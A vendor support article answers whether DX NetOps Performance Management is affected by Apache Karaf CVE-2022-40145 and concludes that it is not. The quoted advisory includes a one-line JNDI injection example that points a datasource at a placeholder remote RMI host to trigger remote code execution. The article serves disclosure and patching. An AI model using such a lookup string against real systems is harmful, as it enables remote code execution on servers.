Is DX NetOps Performance Management affected by Karaf vulnerability CVE-2022-40145 ?

Article ID: 257372

Products

DX NetOps CA Performance Management - Usage and Administration

Issue/Introduction

Is DX NetOps Performance Management affected by the Karaf vulnerability CVE-2022-40145 ?

Details on this vulnerability:
https://karaf.apache.org/security/cve-2022-40145.txt

CVE-2022-40145: LDMP injection vulnerability in JDBC Login Module with JDK 8

Severity: Low

Vendor: The Apache Software Foundation

Versions Affected: all versions of Apache Karaf prior to 4.3.8 or 4.4.2

Description:

This vulnerability is about a potential code injection when an attacker has control of the target LDAP server used in the JDBC JNDI URL.

The method jaas.modules.src.main.java.porg.apache.karaf.jass.modules.jdbc.JDBCUtils#doCreateDatasourceuse uses InitialContext.lookup(jndiName) without filtering.
A user can modify `options.put(JDBCUtils.DATASOURCE, "osgi:" + DataSource.class.getName());` to `options.put(JDBCUtils.DATASOURCE,"jndi:rmi://x.x.x.x:xxxx/Command");` in JdbcLoginModuleTest#setup.
This is vulnerable to a remote code execution (RCE) attack when a configuration uses a JNDI LDAP data source URI when an attacker has control of the target LDAP server.

This has been fixed in revision:

https://gitbox.apache.org/repos/asf?p=karaf.git;h=3819f48341
https://gitbox.apache.org/repos/asf?p=karaf.git;h=2a933445d1

Mitigation: Apache Karaf users should upgrade to 4.3.8 or 4.4.2
or later as soon as possible, or use the correct path.

Environment

Release : 21.2.x - 22.2.x

Resolution

NetOps Performance Management is not affected by this vulnerability: it does not use the vulnerable JDK 8 and JDBCUtils module combination, so the vulnerable code path is never exercised.

In addition, NetOps Performance Management release 22.2.5 will deliver Karaf 4.3.8 to address other vulnerabilities; that Karaf version also contains the fix for CVE-2022-40145.